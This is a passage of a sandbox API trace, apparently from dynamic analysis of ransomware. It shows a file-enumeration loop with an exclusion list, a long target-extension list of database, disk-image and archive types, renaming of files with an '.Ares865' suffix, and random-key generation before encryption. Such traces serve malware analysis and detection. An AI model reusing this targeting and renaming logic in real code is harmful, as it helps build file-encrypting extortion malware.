[0092.547] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x32afc8 [0092.548] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x31afc8 | out: hHeap=0x2b0000) returned 1 [0092.548] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x32b0e0 [0092.548] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9938 [0092.548] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32b0e0 | out: hHeap=0x2b0000) returned 1 [0092.548] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9938 | out: hHeap=0x2b0000) returned 1 [0092.548] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32afc8 | out: hHeap=0x2b0000) returned 1 [0092.548] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0092.548] CloseHandle (hObject=0x15c) returned 1 [0092.548] CloseHandle (hObject=0x118) returned 1 [0092.548] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2ef0 | out: hHeap=0x2b0000) returned 1 [0092.548] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f00d8 | out: hHeap=0x2b0000) returned 1 [0092.548] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cd0020 | out: hHeap=0x2b0000) returned 1 [0092.548] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d71a60, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d71a60, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x7dfec52d, ftLastWriteTime.dwHighDateTime=0x1ca043e, nFileSizeHigh=0x0, nFileSizeLow=0x106, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Run.lnk", cAlternateFileName="")) returned 1 [0092.548] lstrcmpiW (lpString1="Run.lnk", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0092.548] lstrcmpiW (lpString1="Run.lnk", lpString2="aoldtz.exe") returned 1 [0092.548] lstrcmpiW (lpString1="Run.lnk", lpString2=".") returned 1 [0092.549] lstrcmpiW (lpString1="Run.lnk", lpString2="..") returned 1 [0092.549] lstrcmpiW (lpString1="Run.lnk", lpString2="windows") returned -1 [0092.549] lstrcmpiW (lpString1="Run.lnk", lpString2="bootmgr") returned 1 [0092.549] lstrcmpiW (lpString1="Run.lnk", lpString2="temp") returned -1 [0092.549] lstrcmpiW (lpString1="Run.lnk", lpString2="pagefile.sys") returned 1 [0092.550] lstrcmpiW (lpString1="Run.lnk", lpString2="boot") returned 1 [0092.550] lstrcmpiW (lpString1="Run.lnk", lpString2="ids.txt") returned 1 [0092.550] lstrcmpiW (lpString1="Run.lnk", lpString2="ntuser.dat") returned 1 [0092.550] lstrcmpiW (lpString1="Run.lnk", lpString2="perflogs") returned 1 [0092.550] lstrcmpiW (lpString1="Run.lnk", lpString2="MSBuild") returned 1 [0092.550] lstrlenW (lpString="Run.lnk") returned 7 [0092.550] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Start Menu\\Programs\\Accessories\\Notepad.lnk") returned 73 [0092.550] lstrcpyW (in: lpString1=0x2cce47c, lpString2="Run.lnk" | out: lpString1="Run.lnk") returned="Run.lnk" [0092.550] lstrlenW (lpString="Run.lnk") returned 7 [0092.550] lstrlenW (lpString="Ares865") returned 7 [0092.550] lstrlenW (lpString=".dll") returned 4 [0092.550] lstrcmpiW (lpString1="Run.lnk", lpString2=".dll") returned 1 [0092.550] lstrlenW (lpString=".lnk") returned 4 [0092.550] lstrcmpiW (lpString1="Run.lnk", lpString2=".lnk") returned 1 [0092.550] lstrlenW (lpString=".ini") returned 4 [0092.550] lstrcmpiW (lpString1="Run.lnk", lpString2=".ini") returned 1 [0092.550] lstrlenW (lpString=".sys") returned 4 [0092.550] lstrcmpiW (lpString1="Run.lnk", lpString2=".sys") returned 1 [0092.550] lstrlenW (lpString="Run.lnk") returned 7 [0092.550] lstrlenW (lpString="bak") returned 3 [0092.550] lstrcmpiW (lpString1="lnk", lpString2="bak") returned 1 [0092.550] lstrlenW (lpString="ba_") returned 3 [0092.550] lstrcmpiW (lpString1="lnk", lpString2="ba_") returned 1 [0092.550] lstrlenW (lpString="dbb") returned 3 [0092.550] lstrcmpiW (lpString1="lnk", lpString2="dbb") returned 1 [0092.550] lstrlenW (lpString="vmdk") returned 4 [0092.550] lstrcmpiW (lpString1=".lnk", lpString2="vmdk") returned -1 [0092.550] lstrlenW (lpString="rar") returned 3 [0092.550] lstrcmpiW (lpString1="lnk", lpString2="rar") returned -1 [0092.550] lstrlenW (lpString="zip") returned 3 [0092.551] lstrcmpiW (lpString1="lnk", lpString2="zip") returned -1 [0092.551] lstrlenW (lpString="tgz") returned 3 [0092.551] lstrcmpiW (lpString1="lnk", lpString2="tgz") returned -1 [0092.551] lstrlenW (lpString="vbox") returned 4 [0092.551] lstrcmpiW (lpString1=".lnk", lpString2="vbox") returned -1 [0092.551] lstrlenW (lpString="vdi") returned 3 [0092.551] lstrcmpiW (lpString1="lnk", lpString2="vdi") returned -1 [0092.551] lstrlenW (lpString="vhd") returned 3 [0092.551] lstrcmpiW (lpString1="lnk", lpString2="vhd") returned -1 [0092.551] lstrlenW (lpString="vhdx") returned 4 [0092.551] lstrcmpiW (lpString1=".lnk", lpString2="vhdx") returned -1 [0092.551] lstrlenW (lpString="avhd") returned 4 [0092.551] lstrcmpiW (lpString1=".lnk", lpString2="avhd") returned -1 [0092.551] lstrlenW (lpString="db") returned 2 [0092.551] lstrcmpiW (lpString1="nk", lpString2="db") returned 1 [0092.551] lstrlenW (lpString="db2") returned 3 [0092.551] lstrcmpiW (lpString1="lnk", lpString2="db2") returned 1 [0092.551] lstrlenW (lpString="db3") returned 3 [0092.551] lstrcmpiW (lpString1="lnk", lpString2="db3") returned 1 [0092.551] lstrlenW (lpString="dbf") returned 3 [0092.551] lstrcmpiW (lpString1="lnk", lpString2="dbf") returned 1 [0092.551] lstrlenW (lpString="mdf") returned 3 [0092.551] lstrcmpiW (lpString1="lnk", lpString2="mdf") returned -1 [0092.551] lstrlenW (lpString="mdb") returned 3 [0092.551] lstrcmpiW (lpString1="lnk", lpString2="mdb") returned -1 [0092.551] lstrlenW (lpString="sql") returned 3 [0092.551] lstrcmpiW (lpString1="lnk", lpString2="sql") returned -1 [0092.551] lstrlenW (lpString="sqlite") returned 6 [0092.551] lstrcmpiW (lpString1="un.lnk", lpString2="sqlite") returned 1 [0092.551] lstrlenW (lpString="sqlite3") returned 7 [0092.551] lstrlenW (lpString="sqlitedb") returned 8 [0092.551] lstrlenW (lpString="xml") returned 3 [0092.551] lstrcmpiW (lpString1="lnk", lpString2="xml") returned -1 [0092.551] lstrlenW (lpString="$er") returned 3 [0092.551] lstrcmpiW (lpString1="lnk", lpString2="$er") returned 1 [0092.551] lstrlenW (lpString="4dd") returned 3 [0092.551] lstrcmpiW (lpString1="lnk", lpString2="4dd") returned 1 [0092.552] lstrlenW (lpString="4dl") returned 3 [0092.552] lstrcmpiW (lpString1="lnk", lpString2="4dl") returned 1 [0092.552] lstrlenW (lpString="^^^") returned 3 [0092.552] lstrcmpiW (lpString1="lnk", lpString2="^^^") returned 1 [0092.552] lstrlenW (lpString="abs") returned 3 [0092.552] lstrcmpiW (lpString1="lnk", lpString2="abs") returned 1 [0092.552] lstrlenW (lpString="abx") returned 3 [0092.552] lstrcmpiW (lpString1="lnk", lpString2="abx") returned 1 [0092.552] lstrlenW (lpString="accdb") returned 5 [0092.552] lstrcmpiW (lpString1="n.lnk", lpString2="accdb") returned 1 [0092.552] lstrlenW (lpString="accdc") returned 5 [0092.552] lstrcmpiW (lpString1="n.lnk", lpString2="accdc") returned 1 [0092.552] lstrlenW (lpString="accde") returned 5 [0092.552] lstrcmpiW (lpString1="n.lnk", lpString2="accde") returned 1 [0092.552] lstrlenW (lpString="accdr") returned 5 [0092.552] lstrcmpiW (lpString1="n.lnk", lpString2="accdr") returned 1 [0092.552] lstrlenW (lpString="accdt") returned 5 [0092.552] lstrcmpiW (lpString1="n.lnk", lpString2="accdt") returned 1 [0092.552] lstrlenW (lpString="accdw") returned 5 [0092.552] lstrcmpiW (lpString1="n.lnk", lpString2="accdw") returned 1 [0092.552] lstrlenW (lpString="accft") returned 5 [0092.552] lstrcmpiW (lpString1="n.lnk", lpString2="accft") returned 1 [0092.552] lstrlenW (lpString="adb") returned 3 [0092.552] lstrcmpiW (lpString1="lnk", lpString2="adb") returned 1 [0092.552] lstrlenW (lpString="adb") returned 3 [0092.552] lstrcmpiW (lpString1="lnk", lpString2="adb") returned 1 [0092.552] lstrlenW (lpString="ade") returned 3 [0092.552] lstrcmpiW (lpString1="lnk", lpString2="ade") returned 1 [0092.552] lstrlenW (lpString="adf") returned 3 [0092.552] lstrcmpiW (lpString1="lnk", lpString2="adf") returned 1 [0092.552] lstrlenW (lpString="adn") returned 3 [0092.552] lstrcmpiW (lpString1="lnk", lpString2="adn") returned 1 [0092.552] lstrlenW (lpString="adp") returned 3 [0092.552] lstrcmpiW (lpString1="lnk", lpString2="adp") returned 1 [0092.552] lstrlenW (lpString="alf") returned 3 [0092.552] lstrcmpiW (lpString1="lnk", lpString2="alf") returned 1 [0092.552] lstrlenW (lpString="ask") returned 3 [0092.553] lstrcmpiW (lpString1="lnk", lpString2="ask") returned 1 [0092.553] lstrlenW (lpString="btr") returned 3 [0092.553] lstrcmpiW (lpString1="lnk", lpString2="btr") returned 1 [0092.553] lstrlenW (lpString="cat") returned 3 [0092.553] lstrcmpiW (lpString1="lnk", lpString2="cat") returned 1 [0092.553] lstrlenW (lpString="cdb") returned 3 [0092.553] lstrcmpiW (lpString1="lnk", lpString2="cdb") returned 1 [0092.553] lstrlenW (lpString="ckp") returned 3 [0092.553] lstrcmpiW (lpString1="lnk", lpString2="ckp") returned 1 [0092.553] lstrlenW (lpString="cma") returned 3 [0092.553] lstrcmpiW (lpString1="lnk", lpString2="cma") returned 1 [0092.553] lstrlenW (lpString="cpd") returned 3 [0092.553] lstrcmpiW (lpString1="lnk", lpString2="cpd") returned 1 [0092.553] lstrlenW (lpString="dacpac") returned 6 [0092.553] lstrcmpiW (lpString1="un.lnk", lpString2="dacpac") returned 1 [0092.553] lstrlenW (lpString="dad") returned 3 [0092.553] lstrcmpiW (lpString1="lnk", lpString2="dad") returned 1 [0092.553] lstrlenW (lpString="dadiagrams") returned 10 [0092.553] lstrlenW (lpString="daschema") returned 8 [0092.553] lstrlenW (lpString="db-journal") returned 10 [0092.553] lstrlenW (lpString="db-shm") returned 6 [0092.553] lstrcmpiW (lpString1="un.lnk", lpString2="db-shm") returned 1 [0092.553] lstrlenW (lpString="db-wal") returned 6 [0092.553] lstrcmpiW (lpString1="un.lnk", lpString2="db-wal") returned 1 [0092.553] lstrlenW (lpString="dbc") returned 3 [0092.553] lstrcmpiW (lpString1="lnk", lpString2="dbc") returned 1 [0092.553] lstrlenW (lpString="dbs") returned 3 [0092.553] lstrcmpiW (lpString1="lnk", lpString2="dbs") returned 1 [0092.553] lstrlenW (lpString="dbt") returned 3 [0092.553] lstrcmpiW (lpString1="lnk", lpString2="dbt") returned 1 [0092.553] lstrlenW (lpString="dbv") returned 3 [0092.553] lstrcmpiW (lpString1="lnk", lpString2="dbv") returned 1 [0092.553] lstrlenW (lpString="dbx") returned 3 [0092.553] lstrcmpiW (lpString1="lnk", lpString2="dbx") returned 1 [0092.553] lstrlenW (lpString="dcb") returned 3 [0092.553] lstrcmpiW (lpString1="lnk", lpString2="dcb") returned 1 [0092.553] lstrlenW (lpString="dct") returned 3 [0092.554] lstrcmpiW (lpString1="lnk", lpString2="dct") returned 1 [0092.554] lstrlenW (lpString="dcx") returned 3 [0092.554] lstrcmpiW (lpString1="lnk", lpString2="dcx") returned 1 [0092.554] lstrlenW (lpString="ddl") returned 3 [0092.554] lstrcmpiW (lpString1="lnk", lpString2="ddl") returned 1 [0092.554] lstrlenW (lpString="dlis") returned 4 [0092.554] lstrcmpiW (lpString1=".lnk", lpString2="dlis") returned -1 [0092.555] lstrlenW (lpString="dp1") returned 3 [0092.555] lstrcmpiW (lpString1="lnk", lpString2="dp1") returned 1 [0092.555] lstrlenW (lpString="dqy") returned 3 [0092.555] lstrcmpiW (lpString1="lnk", lpString2="dqy") returned 1 [0092.555] lstrlenW (lpString="dsk") returned 3 [0092.555] lstrcmpiW (lpString1="lnk", lpString2="dsk") returned 1 [0092.556] lstrlenW (lpString="dsn") returned 3 [0092.556] lstrcmpiW (lpString1="lnk", lpString2="dsn") returned 1 [0092.556] lstrlenW (lpString="dtsx") returned 4 [0092.556] lstrcmpiW (lpString1=".lnk", lpString2="dtsx") returned -1 [0092.556] lstrlenW (lpString="dxl") returned 3 [0092.556] lstrcmpiW (lpString1="lnk", lpString2="dxl") returned 1 [0092.556] lstrlenW (lpString="eco") returned 3 [0092.556] lstrcmpiW (lpString1="lnk", lpString2="eco") returned 1 [0092.556] lstrlenW (lpString="ecx") returned 3 [0092.556] lstrcmpiW (lpString1="lnk", lpString2="ecx") returned 1 [0092.557] lstrlenW (lpString="edb") returned 3 [0092.558] lstrcmpiW (lpString1="lnk", lpString2="edb") returned 1 [0092.558] lstrlenW (lpString="epim") returned 4 [0092.558] lstrcmpiW (lpString1=".lnk", lpString2="epim") returned -1 [0092.558] lstrlenW (lpString="fcd") returned 3 [0092.558] lstrcmpiW (lpString1="lnk", lpString2="fcd") returned 1 [0092.558] lstrlenW (lpString="fdb") returned 3 [0092.558] lstrcmpiW (lpString1="lnk", lpString2="fdb") returned 1 [0092.558] lstrlenW (lpString="fic") returned 3 [0092.558] lstrcmpiW (lpString1="lnk", lpString2="fic") returned 1 [0092.558] lstrlenW (lpString="flexolibrary") returned 12 [0092.558] lstrlenW (lpString="fm5") returned 3 [0092.558] lstrcmpiW (lpString1="lnk", lpString2="fm5") returned 1 [0092.558] lstrlenW (lpString="fmp") returned 3 [0092.558] lstrcmpiW (lpString1="lnk", lpString2="fmp") returned 1 [0092.558] lstrlenW (lpString="fmp12") returned 5 [0092.559] lstrcmpiW (lpString1="n.lnk", lpString2="fmp12") returned 1 [0092.559] lstrlenW (lpString="fmpsl") returned 5 [0092.559] lstrcmpiW (lpString1="n.lnk", lpString2="fmpsl") returned 1 [0092.559] lstrlenW (lpString="fol") returned 3 [0092.559] lstrcmpiW (lpString1="lnk", lpString2="fol") returned 1 [0092.559] lstrlenW (lpString="fp3") returned 3 [0092.559] lstrcmpiW (lpString1="lnk", lpString2="fp3") returned 1 [0092.559] lstrlenW (lpString="fp4") returned 3 [0092.559] lstrcmpiW (lpString1="lnk", lpString2="fp4") returned 1 [0092.559] lstrlenW (lpString="fp5") returned 3 [0092.559] lstrcmpiW (lpString1="lnk", lpString2="fp5") returned 1 [0092.559] lstrlenW (lpString="fp7") returned 3 [0092.559] lstrcmpiW (lpString1="lnk", lpString2="fp7") returned 1 [0092.559] lstrlenW (lpString="fpt") returned 3 [0092.559] lstrcmpiW (lpString1="lnk", lpString2="fpt") returned 1 [0092.559] lstrlenW (lpString="frm") returned 3 [0092.559] lstrcmpiW (lpString1="lnk", lpString2="frm") returned 1 [0092.559] lstrlenW (lpString="gdb") returned 3 [0092.559] lstrcmpiW (lpString1="lnk", lpString2="gdb") returned 1 [0092.559] lstrlenW (lpString="gdb") returned 3 [0092.559] lstrcmpiW (lpString1="lnk", lpString2="gdb") returned 1 [0092.559] lstrlenW (lpString="grdb") returned 4 [0092.559] lstrcmpiW (lpString1=".lnk", lpString2="grdb") returned -1 [0092.559] lstrlenW (lpString="gwi") returned 3 [0092.559] lstrcmpiW (lpString1="lnk", lpString2="gwi") returned 1 [0092.559] lstrlenW (lpString="hdb") returned 3 [0092.559] lstrcmpiW (lpString1="lnk", lpString2="hdb") returned 1 [0092.559] lstrlenW (lpString="his") returned 3 [0092.559] lstrcmpiW (lpString1="lnk", lpString2="his") returned 1 [0092.559] lstrlenW (lpString="ib") returned 2 [0092.559] lstrcmpiW (lpString1="nk", lpString2="ib") returned 1 [0092.559] lstrlenW (lpString="idb") returned 3 [0092.559] lstrcmpiW (lpString1="lnk", lpString2="idb") returned 1 [0092.559] lstrlenW (lpString="ihx") returned 3 [0092.559] lstrcmpiW (lpString1="lnk", lpString2="ihx") returned 1 [0092.559] lstrlenW (lpString="itdb") returned 4 [0092.559] lstrcmpiW (lpString1=".lnk", lpString2="itdb") returned -1 [0092.560] lstrlenW (lpString="itw") returned 3 [0092.560] lstrcmpiW (lpString1="lnk", lpString2="itw") returned 1 [0092.560] lstrlenW (lpString="jet") returned 3 [0092.560] lstrcmpiW (lpString1="lnk", lpString2="jet") returned 1 [0092.560] lstrlenW (lpString="jtx") returned 3 [0092.560] lstrcmpiW (lpString1="lnk", lpString2="jtx") returned 1 [0092.560] lstrlenW (lpString="kdb") returned 3 [0092.560] lstrcmpiW (lpString1="lnk", lpString2="kdb") returned 1 [0092.560] lstrlenW (lpString="kexi") returned 4 [0092.560] lstrcmpiW (lpString1=".lnk", lpString2="kexi") returned -1 [0092.560] lstrlenW (lpString="kexic") returned 5 [0092.560] lstrcmpiW (lpString1="n.lnk", lpString2="kexic") returned 1 [0092.560] lstrlenW (lpString="kexis") returned 5 [0092.561] lstrcmpiW (lpString1="n.lnk", lpString2="kexis") returned 1 [0092.561] lstrlenW (lpString="lgc") returned 3 [0092.561] lstrcmpiW (lpString1="lnk", lpString2="lgc") returned 1 [0092.561] lstrlenW (lpString="lwx") returned 3 [0092.561] lstrcmpiW (lpString1="lnk", lpString2="lwx") returned -1 [0092.561] lstrlenW (lpString="maf") returned 3 [0092.561] lstrcmpiW (lpString1="lnk", lpString2="maf") returned -1 [0092.561] lstrlenW (lpString="maq") returned 3 [0092.561] lstrcmpiW (lpString1="lnk", lpString2="maq") returned -1 [0092.561] lstrlenW (lpString="mar") returned 3 [0092.561] lstrcmpiW (lpString1="lnk", lpString2="mar") returned -1 [0092.561] lstrlenW (lpString="marshal") returned 7 [0092.561] lstrlenW (lpString="mas") returned 3 [0092.561] lstrcmpiW (lpString1="lnk", lpString2="mas") returned -1 [0092.561] lstrlenW (lpString="mav") returned 3 [0092.561] lstrcmpiW (lpString1="lnk", lpString2="mav") returned -1 [0092.561] lstrlenW (lpString="maw") returned 3 [0092.561] lstrcmpiW (lpString1="lnk", lpString2="maw") returned -1 [0092.561] lstrlenW (lpString="mdbhtml") returned 7 [0092.561] lstrlenW (lpString="mdn") returned 3 [0092.561] lstrcmpiW (lpString1="lnk", lpString2="mdn") returned -1 [0092.561] lstrlenW (lpString="mdt") returned 3 [0092.561] lstrcmpiW (lpString1="lnk", lpString2="mdt") returned -1 [0092.561] lstrlenW (lpString="mfd") returned 3 [0092.561] lstrcmpiW (lpString1="lnk", lpString2="mfd") returned -1 [0092.561] lstrlenW (lpString="mpd") returned 3 [0092.561] lstrcmpiW (lpString1="lnk", lpString2="mpd") returned -1 [0092.561] lstrlenW (lpString="mrg") returned 3 [0092.561] lstrcmpiW (lpString1="lnk", lpString2="mrg") returned -1 [0092.561] lstrlenW (lpString="mud") returned 3 [0092.561] lstrcmpiW (lpString1="lnk", lpString2="mud") returned -1 [0092.561] lstrlenW (lpString="mwb") returned 3 [0092.561] lstrcmpiW (lpString1="lnk", lpString2="mwb") returned -1 [0092.561] lstrlenW (lpString="myd") returned 3 [0092.562] lstrcmpiW (lpString1="lnk", lpString2="myd") returned -1 [0092.562] lstrlenW (lpString="ndf") returned 3 [0092.562] lstrcmpiW (lpString1="lnk", lpString2="ndf") returned -1 [0092.562] lstrlenW (lpString="nnt") returned 3 [0092.562] lstrcmpiW (lpString1="lnk", lpString2="nnt") returned -1 [0092.562] lstrlenW (lpString="nrmlib") returned 6 [0092.562] lstrcmpiW (lpString1="un.lnk", lpString2="nrmlib") returned 1 [0092.562] lstrlenW (lpString="ns2") returned 3 [0092.562] lstrcmpiW (lpString1="lnk", lpString2="ns2") returned -1 [0092.562] lstrlenW (lpString="ns3") returned 3 [0092.562] lstrcmpiW (lpString1="lnk", lpString2="ns3") returned -1 [0092.562] lstrlenW (lpString="ns4") returned 3 [0092.562] lstrcmpiW (lpString1="lnk", lpString2="ns4") returned -1 [0092.562] lstrlenW (lpString="nsf") returned 3 [0092.562] lstrcmpiW (lpString1="lnk", lpString2="nsf") returned -1 [0092.562] lstrlenW (lpString="nv") returned 2 [0092.562] lstrcmpiW (lpString1="nk", lpString2="nv") returned -1 [0092.562] lstrlenW (lpString="nv2") returned 3 [0092.562] lstrcmpiW (lpString1="lnk", lpString2="nv2") returned -1 [0092.562] lstrlenW (lpString="nwdb") returned 4 [0092.562] lstrcmpiW (lpString1=".lnk", lpString2="nwdb") returned -1 [0092.562] lstrlenW (lpString="nyf") returned 3 [0092.562] lstrcmpiW (lpString1="lnk", lpString2="nyf") returned -1 [0092.562] lstrlenW (lpString="odb") returned 3 [0092.562] lstrcmpiW (lpString1="lnk", lpString2="odb") returned -1 [0092.562] lstrlenW (lpString="odb") returned 3 [0092.562] lstrcmpiW (lpString1="lnk", lpString2="odb") returned -1 [0092.562] lstrlenW (lpString="oqy") returned 3 [0092.562] lstrcmpiW (lpString1="lnk", lpString2="oqy") returned -1 [0092.562] lstrlenW (lpString="ora") returned 3 [0092.562] lstrcmpiW (lpString1="lnk", lpString2="ora") returned -1 [0092.562] lstrlenW (lpString="orx") returned 3 [0092.562] lstrcmpiW (lpString1="lnk", lpString2="orx") returned -1 [0092.562] lstrlenW (lpString="owc") returned 3 [0092.562] lstrcmpiW (lpString1="lnk", lpString2="owc") returned -1 [0092.562] lstrlenW (lpString="p96") returned 3 [0092.562] lstrcmpiW (lpString1="lnk", lpString2="p96") returned -1 [0092.563] lstrlenW (lpString="p97") returned 3 [0092.563] lstrcmpiW (lpString1="lnk", lpString2="p97") returned -1 [0092.563] lstrlenW (lpString="pan") returned 3 [0092.563] lstrcmpiW (lpString1="lnk", lpString2="pan") returned -1 [0092.563] lstrlenW (lpString="pdb") returned 3 [0092.563] lstrcmpiW (lpString1="lnk", lpString2="pdb") returned -1 [0092.563] lstrlenW (lpString="pdm") returned 3 [0092.563] lstrcmpiW (lpString1="lnk", lpString2="pdm") returned -1 [0092.563] lstrlenW (lpString="pnz") returned 3 [0092.563] lstrcmpiW (lpString1="lnk", lpString2="pnz") returned -1 [0092.563] lstrlenW (lpString="qry") returned 3 [0092.563] lstrcmpiW (lpString1="lnk", lpString2="qry") returned -1 [0092.563] lstrlenW (lpString="qvd") returned 3 [0092.563] lstrcmpiW (lpString1="lnk", lpString2="qvd") returned -1 [0092.563] lstrlenW (lpString="rbf") returned 3 [0092.563] lstrcmpiW (lpString1="lnk", lpString2="rbf") returned -1 [0092.563] lstrlenW (lpString="rctd") returned 4 [0092.563] lstrcmpiW (lpString1=".lnk", lpString2="rctd") returned -1 [0092.563] lstrlenW (lpString="rod") returned 3 [0092.563] lstrcmpiW (lpString1="lnk", lpString2="rod") returned -1 [0092.563] lstrlenW (lpString="rodx") returned 4 [0092.563] lstrcmpiW (lpString1=".lnk", lpString2="rodx") returned -1 [0092.563] lstrlenW (lpString="rpd") returned 3 [0092.563] lstrcmpiW (lpString1="lnk", lpString2="rpd") returned -1 [0092.563] lstrlenW (lpString="rsd") returned 3 [0092.563] lstrcmpiW (lpString1="lnk", lpString2="rsd") returned -1 [0092.563] lstrlenW (lpString="sas7bdat") returned 8 [0092.563] lstrlenW (lpString="sbf") returned 3 [0092.563] lstrcmpiW (lpString1="lnk", lpString2="sbf") returned -1 [0092.563] lstrlenW (lpString="scx") returned 3 [0092.563] lstrcmpiW (lpString1="lnk", lpString2="scx") returned -1 [0092.563] lstrlenW (lpString="sdb") returned 3 [0092.563] lstrcmpiW (lpString1="lnk", lpString2="sdb") returned -1 [0092.563] lstrlenW (lpString="sdc") returned 3 [0092.563] lstrcmpiW (lpString1="lnk", lpString2="sdc") returned -1 [0092.563] lstrlenW (lpString="sdf") returned 3 [0092.563] lstrcmpiW (lpString1="lnk", lpString2="sdf") returned -1 [0092.564] lstrlenW (lpString="sis") returned 3 [0092.564] lstrcmpiW (lpString1="lnk", lpString2="sis") returned -1 [0092.564] lstrlenW (lpString="spq") returned 3 [0092.564] lstrcmpiW (lpString1="lnk", lpString2="spq") returned -1 [0092.564] lstrlenW (lpString="te") returned 2 [0092.564] lstrcmpiW (lpString1="nk", lpString2="te") returned -1 [0092.564] lstrlenW (lpString="teacher") returned 7 [0092.564] lstrlenW (lpString="tmd") returned 3 [0092.564] lstrcmpiW (lpString1="lnk", lpString2="tmd") returned -1 [0092.564] lstrlenW (lpString="tps") returned 3 [0092.564] lstrcmpiW (lpString1="lnk", lpString2="tps") returned -1 [0092.564] lstrlenW (lpString="trc") returned 3 [0092.564] lstrcmpiW (lpString1="lnk", lpString2="trc") returned -1 [0092.564] lstrlenW (lpString="trc") returned 3 [0092.564] lstrcmpiW (lpString1="lnk", lpString2="trc") returned -1 [0092.564] lstrlenW (lpString="trm") returned 3 [0092.564] lstrcmpiW (lpString1="lnk", lpString2="trm") returned -1 [0092.564] lstrlenW (lpString="udb") returned 3 [0092.564] lstrcmpiW (lpString1="lnk", lpString2="udb") returned -1 [0092.564] lstrlenW (lpString="udl") returned 3 [0092.564] lstrcmpiW (lpString1="lnk", lpString2="udl") returned -1 [0092.564] lstrlenW (lpString="usr") returned 3 [0092.564] lstrcmpiW (lpString1="lnk", lpString2="usr") returned -1 [0092.564] lstrlenW (lpString="v12") returned 3 [0092.564] lstrcmpiW (lpString1="lnk", lpString2="v12") returned -1 [0092.564] lstrlenW (lpString="vis") returned 3 [0092.564] lstrcmpiW (lpString1="lnk", lpString2="vis") returned -1 [0092.564] lstrlenW (lpString="vpd") returned 3 [0092.564] lstrcmpiW (lpString1="lnk", lpString2="vpd") returned -1 [0092.564] lstrlenW (lpString="vvv") returned 3 [0092.564] lstrcmpiW (lpString1="lnk", lpString2="vvv") returned -1 [0092.564] lstrlenW (lpString="wdb") returned 3 [0092.564] lstrcmpiW (lpString1="lnk", lpString2="wdb") returned -1 [0092.564] lstrlenW (lpString="wmdb") returned 4 [0092.565] lstrcmpiW (lpString1=".lnk", lpString2="wmdb") returned -1 [0092.565] lstrlenW (lpString="wrk") returned 3 [0092.565] lstrcmpiW (lpString1="lnk", lpString2="wrk") returned -1 [0092.565] lstrlenW (lpString="xdb") returned 3 [0092.565] lstrcmpiW (lpString1="lnk", lpString2="xdb") returned -1 [0092.565] lstrlenW (lpString="xld") returned 3 [0092.565] lstrcmpiW (lpString1="lnk", lpString2="xld") returned -1 [0092.565] lstrlenW (lpString="xmlff") returned 5 [0092.565] lstrcmpiW (lpString1="n.lnk", lpString2="xmlff") returned -1 [0092.565] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Start Menu\\Programs\\Accessories\\Run.lnk.Ares865") returned 77 [0092.565] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Start Menu\\Programs\\Accessories\\Run.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\start menu\\programs\\accessories\\run.lnk"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Start Menu\\Programs\\Accessories\\Run.lnk.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\start menu\\programs\\accessories\\run.lnk.ares865"), dwFlags=0x1) returned 1 [0092.567] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Start Menu\\Programs\\Accessories\\Run.lnk.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\start menu\\programs\\accessories\\run.lnk.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0092.567] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=262) returned 1 [0092.567] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0092.568] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2ef0 [0092.568] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0092.568] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0092.568] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0092.568] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0092.568] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x410, lpName=0x0) returned 0x15c [0092.570] MapViewOfFile (hFileMappingObject=0x15c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x410) returned 0x190000 [0092.571] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0092.572] CryptGenRandom (in: 